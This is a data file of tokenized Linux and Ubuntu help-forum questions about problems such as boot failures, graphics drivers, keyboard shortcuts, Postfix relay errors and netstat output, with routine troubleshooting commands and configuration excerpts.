515849	how to see , which key is pressed , as seen by unity window manager ?	after a system crash , the shortcuts i use for switching the workplaces with mod_3 modifier ( e.g . mod_3 + left to switch workplace left ) ceased to work . i use the following .xmodmap script : remove control = control_r clear mod3 add mod3 = control_r loaded with xmodmap .xmodmap . the control_r key is working properly , as reported by xev . but xev is too much `` low level '' - it shows physical keys pressed . i need something that allow me to verify that pressing `` right control '' together with `` left arrow '' is seen as mod3+left to the unity . something , that could replace the partially broken all settings- > keyboard window ( it was never compatible with the mod3 compose key ) . update : it appeared , that the shortucts were disabled because the desktop wall compiz plugin was disabled . enabling it brought back the functionality . nevertheless the question stands valid and unanswered .
515851	unable to assign command output to a variable	i am trying to assign the latest file name obtained from the below ls command but getting some error , it would be very nice if someone can answer how can i fix this ! fn=`ls -lrt pur_bom_interface_daily*.log | cut -c59-102 | tail -1` or fn= $ ( ls -lrt pur_bom_interface_daily*.log | cut -c59-102 | tail -1 ) error got : ls : 0653-341 the file pur_bom_interface_daily*.log does not exist note : pur_bom_interface_daily*.log i am using * since there are multiple files starting their name with pur_bom_interface_daily and concatanated with the date on which they have got created .
515854	acer c720 chubuntu14.04-java uncaught exceptions	i was able to download a digital microscope program but am unable to run because of several java uncaught exception , i thought i needed to up the graphics , but that did not help , any suggestions ? here 's what came up : java.lang.unsatisfiedlinkerror : unable to load library 'kenasnap ' : module not found at.com.sun.jna.nativelibrary.loadlibrary ( nativelibrary.java:145 ) at.com.sun.jna.nativelibrary.getinstance ( nativelibrary.java:188 ) at.com.sun.jna.library $ handler. < init > ( library.java.123 ) at.com.sun.jna.native.loadlibrary ( native.java:255 ) at.com.sun.jna.native.loadlibrary ( native.java:241 ) at.com.kav.av4.system.kenasnap. < clinit > ( kenasnap.java:69 ) at.com.kav.av4.av4frame.gstwindowsinit ( ( avframe.java:2510 ) at.com.kav.av4.av4frame.main ( av4frame.java.3131 )
515858	startx results in a black screen	i recently wanted to solve a problem with using a second monitor from my laptop that is running debian ( jessie ) but because i lack knowledge things did n't go as planned . now i am getting booted into tty1 , without any kind of graphical environment starting . i got a dell xps17 laptop , using an intel hd 2nd gen chipset and a nvidia gt555m graphic card . what i initially did was install some drivers ( some nvidia drivers iirc ) and then creating an xorg.conf . when i now execute startx only a black screen appears , but no errors are printed in the /var/log/xorg.0.log . my goal is to make the default laptop display run again , using the intel hd graphic card and an additional monitor using the nvidia card ( but i would be happy as well if only the laptop display would work again ) . what do ? i 'm not that familiar with linux/unix and i would appreciate any step-by-step solution available .
515863	export env variables to grandchild jobs	i have a set of upstart scripts , generated by foreman from a procfile , to start my web service and async task queue worker . the way foreman generates the scripts is as follows : app app-web app-web-1 app-worker app-worker-1 where `` app-web '' and `` app-worker '' are set to start on starting `` app '' , and `` app-web-1 '' and `` app-worker-1 '' are set to start on starting `` app-web '' and `` app-worker '' respectively . as i understand it , this structure is to allow you to easily add further web and worker processes when load increases , while still managing the whole thing from the top-level `` app '' job . so , i want to set various environment variables in my jobs . i can of course put them directly into the bottom-level scripts , but it would be better to put them in the top level so they only have to be defined once . i thought i would be able to do this in app.conf by simply using env and export : env foo=bar export foo but this does n't seem to work : it 's fine if i put it in the middle `` app-web '' job , but if i put in the top-level `` app '' it does n't get inherited by the bottom-level `` app-web-1 '' . so , my second attempt was to put that in the top-level script , and then try and re-export in the middle one with just export foo , but this does n't work either . is it possible to do what i want , or should i simply settle for defining the variables in multiple places ?
515864	how to reinitialize processor for /sys and disable integrated graphics	i have upgraded my laptop from intel pentium p6100 to core i5-460m . i5 supports turbo boost . to switch this i need to do : echo 0 or 1 > /sys/devices/system/cpu/cpufreq/boost but my system doesnât have this file . when i start system from livecd this file is present in root of livecd . livecd has same version as installed system . also i have problem with integrated graphics . after boot i have such message : unim95 @ unim95-thinkpad : ~ $ dmesg |grep 915 [ 26.342983 ] intel ips 0000:00:1f.6 : failed to get i915 symbols , graphics turbo disabled how can i control intel vga when ll /sys/kernel/debug/ |grep vgaswitcheroo gives no output . os : = ubuntu 12.04 lts ( livecd too ) laptop : = thikpad edge 14 0578re8 processor : = corei5-460m vga : = ati hd4570/5145
515865	root mail changed	i changed my root email for create a dns server and now i ca n't change anything , i 'm trying to enter as root using `` sudo su '' , but when i write this command , nothing happens , and when i try to move , copy or others usual commands , i recive permission denited .
515869	sublime text : see how many resources each plugin is using	how can i see how many resources each sublime text plugin is using ?
515871	acer c720 chrubuntu 14.04- touchpad does not work	after august update , my touchpad is non existent on ubuntu . it works on chrome but not on ubuntu . the mouse will work on ubuntu . did anyone solve this problem ? i found similar questions ( but not exact ) on other posts , but none of the results worked for me .
515876	terminal paging and scrolling	my terminal is very flaky . even as i write this the webpage will scroll up and down almost at random . the same goes for my terminal . i will try to type , and the terminal will start paging and scrolling up and down seemingly without cause . as i write this , the page will scroll up and down as well . also , sometimes when i am typing a white box will appear in the lower right corner of my screen with the letters and words of what i am typing . can anyone tell me how to turn this behaviour off ? or at least what is causing it ? there are times i can barely type . is there a way to completely turn off terminal scrolling and paging completely ? and why is this happening when i am on a webpage as well . i wonder if it has anything to do with my touchpad . ubuntu 14 hp 2000 notebook thanks in advance .
515877	problems after upgrading my ubuntu to ubuntu 14.04 lts	i have problems after upgrading my older ubuntu version to ubuntu 14.04 lts . i was offered this installation and after the procss and restarting of the computer there is just a black page with following message : mount : mounting /dev/loop0 on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _ the windows which is installed on my laptop works normally . thannk you very much for any answer .
515879	amazon instant video 14.04.1 lts	i have recently installed ubuntu 14.04.1 lts and i am having trouble using amazon instant video . when i click on a video to play there is no option to play it , it just says that i can play it on a compatible device ( kindle , phone , ... ) is there some package or something that i need to install ? thanks for any help i have successfully ( i think ) implemented the solution below but i still have the same problem . after following the below i get : nathan @ nathan-s400ca : ~ $ sudo mkdir /etc/hal/fdi/preprobe [ sudo ] password for nathan : mkdir : can not create directory ‘/etc/hal/fdi/preprobe’ : file exists nathan @ nathan-s400ca : ~ $ sudo mkdir /etc/hal/fdi/information mkdir : can not create directory ‘/etc/hal/fdi/information’ : file exists nathan @ nathan-s400ca : ~ $ /usr/sbin/hald -- daemon=yes -- verbose=yes 18:56:04.123 [ i ] hald.c:672 : hal 0.5.14 18:56:04.123 [ i ] hald.c:673 : using child timeout 250s 18:56:04.123 [ i ] hald.c:685 : will daemonize 18:56:04.123 [ i ] hald.c:686 : becoming a daemon nathan @ nathan-s400ca : ~ $ rm -rf ~/.adobe
515882	how can i get ubuntu 's latest version installed with ati radeon 7850 support ?	i 've seen other questions talking about the driver , but none apply to the problem i 've been having . i downloaded the latest version of ubuntu and installed it , but when unity loads , only the sidebar looks okay . the desktop area in the middle is plain and has a smaller window inside of the desktop that looks like a very tiny mirrored image of what the normal desktop would be , except it has distorted colors and boxes . i tried installing an older version of ubuntu , updating the graphics card driver , then upgrading to the latest version of ubuntu , but arrived at the same problem . is there a way to get this installed correctly , or is this just something i 'll have to deal with as long as i use ati radeon 7850 cards ?
515883	how do i make ctrl+alt+f7 keyboard shortcut work in intellij on ubuntu 14.04	there is already a partial solution to the problem documented on askubuntu.com . unfortunately , it is not working for ctrl+alt+f [ 1-7 ] keys . there was a solution for that in ubuntu 13.04 and eralier to enable `` special keys ( ctrl+alt+ ) handled in a server '' in keyboard layout - > options - > miscellaneous compatibility options . there is also a general x11 xorg solution , but does nor work with ubuntu 14.04 since it has no /etc/x11/xorg.conf . also , i can not find the corresponding option in gnome-tweek-tool , which is supposed to be used in this case according to ubuntu developers . how do i enable special keys ctrl+alt+f [ 1-7 ] in the server so that intellij shortcuts work in ubuntu 14.04 ?
515884	microphone do n't work on skype 4.3 with ubuntu 12.04	i have tried to change all settings on the volume control panel , but nothing happens . i just hear the sound from the pc , but not by microphone .
515885	system settings/ appearance	i upgrade the ubunto from 12.04 to 14.04 and , i can not find the appearance in the system settings , beside some other settings . may someone help me with it ?
515889	ubuntu to xubuntu dual boot	well , ubuntu keeps crashing and from what i 've seen xubuntu has never crashed on me . so i want to put the xubuntu desktop environment over ubuntu . ( it 's unity that keeps crashing ) however , i want to play games on this computer through wine and steam . i also want xubuntu because it will play games more quick considering xubuntu has a lesser 3d graphical interface . can i install the desktop over ubuntu or will i have to grab a xubuntu disk and overwrite ubuntu 14.04 ? all feedback is appreciated and i look forward to your answers . and here is the exact error i get . sorry , ubuntu 14.04 has experienced an internal error . path -/usr/share/unity-scopes/scope-runner-dbus.py ( and yes , i have reinstalled this . but it still crashes . problemtype -crash title -scope-runner-dbus.py crashed with sigsegv in ffl_call_unix64 ( ) architecture -amd64
515891	problems compiling scangearmp	i have already installed some missing packages , but i still get that error . can anyone help me identify what is missing ? thanks a lot psr @ psr-easynote-tm85 : ~/downloads/scangearmp-source-2.10-1/scangearmp $ make make all-recursive make [ 1 ] : entering directory `/home/psr/downloads/scangearmp-source-2.10-1/scangearmp' making all in po make [ 2 ] : entering directory `/home/psr/downloads/scangearmp-source-2.10-1/scangearmp/po' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/psr/downloads/scangearmp-source-2.10-1/scangearmp/po' making all in backend make [ 2 ] : entering directory `/home/psr/downloads/scangearmp-source-2.10-1/scangearmp/backend' /bin/bash ../libtool -- tag=cc -- mode=compile gcc -dhave_config_h -i . -i.. -i . -i./include -dv_major=2 -dv_minor=1 -o2 -d__gimp_plugin_enable__ -d_file_offset_bits=64 -mt libsane_canon_mfp_la-canon_mfp_tools.lo -md -mp -mf .deps/libsane_canon_mfp_la-canon_mfp_tools.tpo -c -o libsane_canon_mfp_la-canon_mfp_tools.lo `test -f 'canon_mfp_tools.c ' || echo './'`canon_mfp_tools.c libtool : compile : gcc -dhave_config_h -i . -i.. -i . -i./include -dv_major=2 -dv_minor=1 -o2 -d__gimp_plugin_enable__ -d_file_offset_bits=64 -mt libsane_canon_mfp_la-canon_mfp_tools.lo -md -mp -mf .deps/libsane_canon_mfp_la-canon_mfp_tools.tpo -c canon_mfp_tools.c -fpic -dpic -o .libs/libsane_canon_mfp_la-canon_mfp_tools.o canon_mfp_tools.c:40:17 : fatal error : usb.h : no such file or directory # include ^ compilation terminated . make [ 2 ] : *** [ libsane_canon_mfp_la-canon_mfp_tools.lo ] error 1 make [ 2 ] : leaving directory `/home/psr/downloads/scangearmp-source-2.10-1/scangearmp/backend' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/psr/downloads/scangearmp-source-2.10-1/scangearmp' make : *** [ all ] error 2 psr @ psr-easynote-tm85 : ~/downloads/scangearmp-source-2.10-1/scangearmp $
515895	running a program in background using command-line	how do i run a program in the background from a shell , with the ability to close the shell while leaving the program running which should not disturb the window i am working on ? lets say my ui is having problems or for some reason , i need to boot up a program from the terminal window . the program should not disturb my window in which i am working on but it should be opened from the command line and i should be able to get access to it using the normal shortcut alt+tab . even the command line should exit during this process . i tried this ... . '' gedit file-name & exit '' this is working fine but the gedit file is opening in the foreground i.e it is focused . ( let i be working on some application like mozilla . after running the command ... .. gedit file is bieng focused rather than mozilla which should not happen ) it is fine if the answer also comes in a script .
515899	install utorrent	i followed these 2 tuts : step by step installation stuff if you are with x64 os well , i am done until the pre-last step . i have created the symlink , and when i navigate to the folder ... /opt/utorrent-server-v3_0 i can see the utserver file . but when i run the command utserver -settingspath /opt/utorrent-server-v3_0/ therefore i can not open the localhost:8080/gui/ ... any ideas what might be the problem and how to proceed ?
515900	how to compare two files	so basically what i want to do is compare two file by line by column 2 . how could i accomplish this ? file_1.txt : user1 us user2 us user3 us file_2.txt : user1 us user2 us user3 ng output_file : user3 has changed
515901	what measurements can i take to prevent an ubuntu update from rendering my laptop useless ?	today is the second time my laptop has not been functional all day after performing a system update . the problem has still not been fixed , but i do n't want to focus on this particular problem , as some years back my desktop also suffered from a system breaking update , and another laptop lost wireless internet because of one . my question is , what are some things i can do to recover from a malicious update as soon as possible ? i simply can not afford hunting some mysterious bug all day , all i want is for things to be the way they were before the update . ubuntu does not have any `` system recovery '' concept like windows does , as far as i know , but something like this is what i would like to mimic . i know you can revert individual packages to a previous version , but this is said to not be the same as the pre-update package . it also requires going through potentially many packages . for what it 's worth , i 'm running ubuntu 14.04 lts with the default update settings , no experimental packages or anything . to get a better idea of what i 'm looking for , here are some ideas that came up after some brainstorming : somehow create a snapshot of the state of the os before updating , similar to the ones you use with a virtual machine . then be able to revert to that snapshot . no clue if this is feasible . create a script to automatically fetch the updated packages of the last update , then revert all of them automatically . install two ubuntu 's on the machine , create back-ups best as possible and in case of failure of the main ubuntu , switch to back-up . the draw-back is having to install/configure software twice , there 's quite some overhead . i 'm quite frustrated as this is taking up entirely too much time , please help me prevent this situation in the future .
515906	windows 8.1 and ubuntu 14.04 do not work	after installing ubuntu 14.04 , my windows 8.1 and ubuntu can not boot anymore , i get the message below , please help me fix it as i can not use my computer any more . i tried to install boot repair through live ubuntu cd to fix it but i can not install it . i appreciate your help and looking forward to hearing from you . boot args ( cat /proc/cmdline ) check rootdelay= ( did the system wait long enough ? ) check root= ( did the system wait for the right device ? ) missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/xxxxxxxxx does not exist . dropping to a shell ! busybox v.1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for list of built-in commands . ( initramfs )
515917	bricked - tty mode incorrect , terminal disabled , unity broken	after installing virtualbox unity seems to be uninstalled.. launcher and task bar are missing . i ca n't access terminal from the normal ctrl alt t command . i tried logging into tty mode but it says my login is incorrect . i am trying to login with my normal ubuntu username and password . i have searched for solutions but since i dont have terminal or tty i cant bash out any commands , and i have tried safeboot but the root terminal always says it cant run whatever command i enter . i am really lost and i am trying to avoid a fresh install : ( i greatly and genuinely appreciate any help ! this is the computer i use for college !
515920	battery status frozen	mates , i have a gateway ne522 laptop . the thing is that one day , i unplugged it before it was fully charged . since then , ubuntu does n't refresh it 's battery status . while windows does . first i thought about bios , so updated it to it 's last version . but still not refreshing battery status on ubuntu . i looked arround and found that the battery status archive is n't updating . well , it 's actually updating every second , but does n't change it 's information . it 's content is : present : yes design capacity : 2500 mah last full capacity : 2331 mah battery technology : rechargeable design voltage : 14800 mv design capacity warning : 161 mah design capacity low : 126 mah cycle count : 0 capacity granularity 1 : 35 mah capacity granularity 2 : 2170 mah model number : al12a32 serial number : 3455 battery type : lion oem info : sanyo does anyone know why might this happen ? thanks in advance ! pablo
515921	system - administration tab is missing	i am told that i need to go to system - administration - however , i do not have administration under my system tab . 14.10 ubuntu .
515926	cuda fails to detect graphics card	i have the problem that i get an error message exception during execution : cuda error : no cuda-capable device is detected ( src/cuda/lm/cuda.cu:60 ) some information on the graphics card : $ lspci -nnk | grep `` vga\|'kern'\|3d\|display '' -a2 02:00.0 vga compatible controller [ 0300 ] : nvidia corporation gk104 [ geforce gtx 680 ] [ 10de:1180 ] ( rev a1 ) subsystem : zotac international ( mco ) ltd. device [ 19da:1255 ] kernel driver in use : nvidia and $ xrandr -- prop screen 0 : minimum 8 x 8 , current 1920 x 1080 , maximum 16384 x 16384 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) borderdimensions : border : cardinal ( 6 ) ( format 16 items 4 ) ? ? ? ? signalformat : vga supported : vga connectortype : dvi-i connectornumber : 0 ( 0x00000000 ) _ connectorlocation : 0 ( 0x00000000 ) dvi-i-1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 531mm x 299mm edid : 00ffffffffffff000469942401010101 0716010380351e78ea9265a655559f28 0d5054bfef00714f818081409500a940 b300d1c00101023a801871382d40582c 4500132b2100001e000000fd00324c1e 5311000a202020202020000000fc0056 453234380a20202020202020000000ff 0043324c4d51533037363031330a00d2 borderdimensions : border : cardinal ( 6 ) ( format 16 items 4 ) ? ? ? ? signalformat : tmds supported : tmds connectortype : dvi-i connectornumber : 0 ( 0x00000000 ) _connectorlocation : 0 ( 0x00000000 ) 1920x1080 60.0*+ 1680x1050 60.0 1600x1200 60.0 1440x900 59.9 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 640x480 75.0 72.8 59.9 hdmi-0 disconnected ( normal left inverted right x axis y axis ) borderdimensions : border : cardinal ( 6 ) ( format 16 items 4 ) ? ? ? ? signalformat : tmds supported : tmds connectortype : hdmi connectornumber : 2 ( 0x00000002 ) _connectorlocation : 2 ( 0x00000002 ) dp-0 disconnected ( normal left inverted right x axis y axis ) borderdimensions : border : cardinal ( 6 ) ( format 16 items 4 ) ? ? ? ? signalformat : tmds supported : tmds connectortype : displayport connectornumber : 3 ( 0x00000003 ) _connectorlocation : 3 ( 0x00000003 ) dvi-d-0 disconnected ( normal left inverted right x axis y axis ) borderdimensions : border : cardinal ( 6 ) ( format 16 items 4 ) ? ? ? ? signalformat : tmds supported : tmds connectortype : dvi-d connectornumber : 1 ( 0x00000001 ) _connectorlocation : 1 ( 0x00000001 ) dp-1 disconnected ( normal left inverted right x axis y axis ) borderdimensions : border : cardinal ( 6 ) ( format 16 items 4 ) ? ? ? ? signalformat : displayport supported : displayport connectortype : displayport connectornumber : 3 ( 0x00000003 ) _connectorlocation : 3 ( 0x00000003 ) a nvidia bugreport can be found on dropbox can anyone tell me how to solve this problem please ? kind regards , david
515928	ubuntu 14.04 boot problem	i am currently using windows 7 and wanted to try out linux . i found out that ubuntu is the most easy to learn linux os . so i create a live usb of ubuntu 14.04 with the help of the following link : how to make your own `` ubuntu liveusb '' i created the live usb successfully , but when i started my pc , i encountered an error message saying : kernel panic - not syncing : attempted to kill init ! along with a lot of commands which i can not even understand . i would be very grateful if anyone can tell me what is wrong .
515931	how do i install muvizu on ubuntu 14,04 lts ?	one of the most used software when i using the windows operating system was muvizu . now that i have migrated to ubuntu 14.04 lts , i am trying to explore the possibilities of installing and running muvizu on ubuntu . i have done alot of research on the matter but it seems like no one has successfully installed and run it , even when using wine . does anyone know how i can successfully install and run muvizu on ubuntu ? looking forward to your reply . thank you in advance
515932	is the problem with my boot loader ?	my system is on dual boot with windows 8.1 and ubuntu with secure boot off and it was working perfectly.but suddenly instead of giving me the option of windows or ubuntu boot loader , it has directly started grub.what is the problem and how should i rectify it ?
515935	454 4.7.1 relay access denied - can send mails but do not receive	i recently installed and configured in my vps a mail service , i can send mails using squirrelmail ... .but i ca n't send using outlook , and give this error ( 454 4.7.1 relay access denied ) ... .i niether of that two i ca n't recieve any mail ... i look up in google many options and no one works for me : ( here is my main.cf # see /usr/share/postfix/main.cf.dist for a commented , more complete version # debian specific : specifying a file name will cause the first # line of that file to be used as the name . the debian default # is /etc/mailname . # myorigin = /etc/mailname smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no # appending .domain is the mua 's job . append_dot_mydomain = no # uncomment the next line to generate `` delayed mail '' warnings # delay_warning_time = 4h readme_directory = no # tls parameters smtpd_tls_cert_file = /etc/ssl/certs/server.crt smtpd_tls_key_file = /etc/ssl/private/server.key smtpd_use_tls=yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache # see /usr/share/doc/postfix/tls_readme.gz in the postfix-doc package for # information on enabling ssl in the smtp client . smtpd_relay_restrictions = permit_mynetworks , permit_sasl_authenticated , defer_unauth_destination myhostname = condordevs.com alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases # mydestination = condordevs.com , localhost.localdomain , localhost mydestination = localhost.localdomain , localhost relayhost = mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_command = procmail -a `` $ extension '' mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all myorigin = /etc/mailname inet_protocols = all home_mailbox = maildir/ smtpd_sasl_type = dovecot smtpd_sasl_path = private/auth smtpd_sasl_local_domain = smtpd_sasl_security_options = noanonymous broken_sasl_auth_clients = yes smtpd_sasl_auth_enable = yes # smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtp_tls_security_level = may smtpd_tls_security_level = may smtp_tls_note_starttls_offer = yes smtpd_tls_loglevel = 1 smtpd_tls_received_header = yes also i check my mx config here http : //mxtoolbox.com/supertool.aspx ? action=mx % 3acondordevs.com & run=toolpage # and gave me the same error ... sorry for my bad english and please help me
515937	what do listen and ports mean in netstat ?	i have been monitoring my system lately and i have found some strange things are running on my system . can anyone please explain what they are and why same program use several processes ? output of netstat and ps -aux : netstat -antplf ( not all processes could be identified , non-owned process info will not be shown , you would have to be root to see it all . ) active internet connections ( servers and established ) proto recv-q send-q local address foreign address state pid/program name < br > tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen - < br > tcp 0 0 127.0.0.1:25 0.0.0.0 : * listen - < br > tcp 0 0 127.0.0.1:9050 0.0.0.0 : * listen - < br > tcp 0 0 0.0.0.0:445 0.0.0.0 : * listen - < br > tcp 0 0 0.0.0.0:139 0.0.0.0 : * listen - < br > tcp 0 0 127.0.0.1:587 0.0.0.0 : * listen - < br > tcp 0 0 0.0.0.0:111 0.0.0.0 : * listen - < br > tcp 0 0 127.0.1.1:53 0.0.0.0 : * listen - < br > tcp 0 0 192.168.0.100:44952 144.76.244.204:443 established 2705/chromium-brows < br > tcp 0 0 192.168.0.100:49334 66.196.66.212:443 established 6796/firefox < br > tcp 0 0 192.168.0.100:40249 69.171.235.19:443 established 6796/firefox < br > tcp 0 0 192.168.0.100:51498 173.194.39.246:443 established 6796/firefox < br > tcp 0 0 192.168.0.100:39152 198.252.206.24:80 established 2705/chromium-brows < br > tcp 0 0 192.168.0.100:49050 2.20.142.212:80 established 2705/chromium-brows < br > tcp 0 0 192.168.0.100:56883 74.125.136.84:443 established 2705/chromium-brows < br > tcp 0 0 192.168.0.100:39153 198.252.206.24:80 established 2705/chromium-brows < br > tcp 0 0 192.168.0.100:50371 142.0.72.109:3389 established 5777/xfreerdp < br > tcp 0 0 192.168.0.100:56903 66.196.120.54:5050 established 5809/pidgin < br > tcp 0 0 192.168.0.100:51073 66.196.120.77:5050 established 5809/pidgin < br > tcp 0 0 192.168.0.100:54875 193.149.89.57:443 established 6796/firefox < br > tcp 0 0 192.168.0.100:40648 152.163.0.143:80 established 6796/firefox < br > tcp 0 0 192.168.0.100:53681 173.194.116.106:443 established 2705/chromium-brows < br > tcp 1 0 192.168.0.100:51012 91.189.89.144:80 close_wait 3829/ubuntu-geoip-p < br > tcp 1 0 192.168.0.100:44527 91.189.89.31:80 close_wait 3871/gvfsd-http < br > tcp 0 0 192.168.0.100:47284 74.125.136.94:443 established 2705/chromium-brows < br > tcp 0 0 192.168.0.100:36697 173.194.66.95:80 established 2705/chromium-brows < br > tcp 0 0 192.168.0.100:37008 173.194.44.52:443 established 2705/chromium-brows < br > tcp 0 0 192.168.0.100:40558 66.196.121.49:5050 established 5809/pidgin < br > tcp 0 0 192.168.0.100:56115 172.227.184.65:443 established 2705/chromium-brows < br > tcp 0 0 192.168.0.100:35533 66.196.120.117:5050 established 5809/pidgin < br > tcp 0 0 192.168.0.100:57169 64.4.44.81:443 established 6796/firefox < br > tcp 0 0 192.168.0.100:58695 198.252.206.25:443 established 2705/chromium-brows < br > tcp 0 0 192.168.0.100:43395 213.157.220.180:443 established 2705/chromium-brows < br > tcp6 0 0 : :1:631 : : : * listen - < br > tcp6 0 0 : ::445 : : : * listen - < br > tcp6 0 0 : ::139 : : : * listen - < br > tcp6 0 0 : ::111 : : : * listen - < br > tcp6 0 0 : ::80 : : : * listen - < br > tcp6 1 0 : :1:33153 : :1:631 close_wait - < br > what are the listen ports and ips at the beginning and the end ? why are they like 0.0.0.0 : * for any ip and any port ? what does it mean ? what are they used for , exactly , please ?
515940	kubuntu upgrade to 14.04 causes hal related failure	after upgrading to kubuntu 14.04 , my pc fails to start-up . i receive failure messages that online posts indicate are due to deprecation of hal . i can boot with xorg . but , how do i remove hal ?
515941	unable to build boost library	i 've got boost via sudo apt-get install libboost-all-dev but now i'am unable to build any boost library in src/include/boost is no bootstrap.sh file . how can i build now ? if i have to install manualy from boost.org . what is the best way to remove my boost lib . thanks in advance and bye
515943	temporarily unable to connect to database	i 've got a fully patched ubuntu 12.04 server vm that i 'm using to host a few low traffic sites . my site is php ( wordpress ) and uses mysqli to connect to a mysql database - pretty standard stuff : ) everything works fine until suddenly connections to the db start failing . pressing refresh a couple of times will make the site work again - for a while . it gets worse and worse until all sites are completely unusable . only restarting apache brings them back . when it 's occurring : * i 've checked that the db is not overloaded * the db is able to accept more connections ( it 's completely idle when the issue is occurring ) . * apache is not overloaded - these are very low traffic sites . * the server is not out of memory or running at a high load average . * there are no errors in any of the logs . researching the issue a bit i find when the problem is occurring although the 'new mysqli ' connect call returns successfully if a do a var_dump on the connection object everything appears to be null . ( server_info = null , client_info = > null etc ) also while the problem is occurring i am able to run php scripts on the command line and they are able to connect to the db successfully . -this problem seems to be within apache . my only option at the moment is to have a cron script to restart apache every 5 minutes - which is really nasty ... can any one help ? please ! ! thanks , stephen
515944	glitch in the ubuntu 14.04 install	i have a 2013 asus 64bit system with windows 7 ( home prem . ) sp1 , 16gb ram , 3.40 gigahertz intel core i7-4770 processor . i downloaded ubuntu 14.04 from the official site . ran md5sum and numbers matched . burned .iso file to dvd with windows disk image burner and verified as ok. partitioned 248gb as unallocated on my c : drive . shut down system and re-booted . set boot to dvd drive . black screen pops up with `` : boot logo - initialization '' and then screen goes to ubuntu ( logo ) and 5 dots below it . the dots sequentially blink white to red . i can hear dvd drive spinning . after a few minutes , the lights all turn red and the drive stops . the screen freezes up . i pressed esc and there is a page full of computer lingo , such as : 166.3485 ] [ fff and a bunch more of hex stuff ] : do_iro+0x4d/0xc0 i 'd really like to install and use ubuntu , but after three solid days , this install attempt is getting old ! ! ! do n't know if it 's an error , me , norton anti-virus settings , etc.suggestions ? ? ? ? ? ? ? ? ?
515945	graphics problem in xubuntu 14.04 : images and text disappear	i recently migrated from win xp to ubuntu , and i have been having a very annoying graphics problem ever since . i am currently running xubuntu 14.04 , but i do not have the impression that the exact linux version matters much , because the problem was not there under xp , but under both lubuntu and xubuntu . as the problem is a bit hard to `` pigeonhole '' , a longer description follows here : menu entries appear sort of `` greyed out '' as soon as the mouse hovers over them ( i.e . when they are highlighted ) ( not really greyed out , but shown in a silvery whitish colour ) which makes it hard to read them . against some backgrounds , it is almost impossible to read these highlighted entries . in some applications , notably synaptic , list entries are not shown ( or disappear as soon as they have been displayed for a microsecond ) . you can sometimes make them temporarily visible by using the scroll wheel , but the visibility is very fleeting , and not predictable . you also see that the entries are definitely `` there '' , because you can move among them using the cursor keys , and in the lower window , which shows the package descriptions , the descriptions change . in thunar ( but it used to be the same in pcfmman under lubuntu ) , icons almost only appear over or beside those entries that the mouse is hovering over . folder icons , when they are there , partly lose their blue color and are shown in white . in firefox , most of the tiles in the graphical menu disappear after having been shown for a microsecond or so . they also can be made to appear briefly by moving the mouse over them , or by clicking and dragging , but the effect is not very predictable . often a part of the background shines through , notably when you type something on the command line in a terminal window . you then see only a part of the background instead of what you have typed , and you can usually make this disappear if you place the terminal window somewhere else , or when you minimise the window which is shining through . notably , the fleetingly-visible list entries were already present in xubuntu 's graphical installer ( e.g . when selecting the language ) , and ( as i already said ) in lubuntu . in evince , pages become suddenly invisible . when you scroll , they reappear . this is quite reliable . no xorg.conf is being used at all . the graphics adaptor is an nvidia geforce4 mx 4000 , the kernel driver used is nouveau . the kernel is passed the kernel option : drm_kms_helper.edid_firmware=vga-1 : edid/1680x1050.bin via grub , to make the the desktop fill my monitor correctly ( which works fine ) . this is all the technical information i can think of at the moment . can anybody give me any suggestions on where to look further ?
515947	how do i open an url from a bash script ?	i have a simple script to start a node.js webserver and open the url in a browser . however the last part does n't seem to work , it wont open the url in a browser ( or anywhere else ) . this is the code i got so far : # ! /bin/bash node server.js ; xdg-open http : //localhost:9000/ ; everywhere i search i find the same , i have to use : xdg-open url but it only seems to work while typing that in the terminal , not in my startserver.sh file . it will start the server but not open the url , typing the code in a terminal however does seem to work . it 's confusing , why does n't it work inside my script ?
515950	no bootable device	i know this is n't exactly a linux problem but i 'm getting no help anywhere else . i 'm trying to reinstall ubuntu onto my laptop but i keep getting the error `` no bootable device -- insert boot disk and press any key '' but i have it on my usb ready to install but for some ready it wo n't recognize it at all . i 've tried everything i could find on the internet and none of them are useful , please help !
515955	how to install ubuntu and applications in separate partition	i what to format my computer such that both the os and all additional applications are going in one partition and all of my person files in a second one . the reason for that is that i can then create a ghost based on the first partition only and therefore save a lot of space . alternatively , i would like some help on how to create a ghost that does n't consider specific folders under my home directory ( i.e . my personal files ) . any ideas ?
515958	how to get exit status of anacron jobs to catch errors ?	it is easy to find failed cron jobs by setting log_level but how to do it with anacron ?
515959	bind mounting for site storage ubuntu and plesk	i have ubuntu 14.04 server installed and plesk cp my system drive is too small to be 9f much use other than running the os and software . so what i was thinking is i have another huge drive that id like to store the sites and mysql databases on . so i assume id need 2 folders ... sites ... databases on this huge drive . what im wanting to know is how can i either symlink or bind mount them so plesk thinks its the proper default locations ? i tried googling and all the `` solutions '' ended up failung because of plesk config .
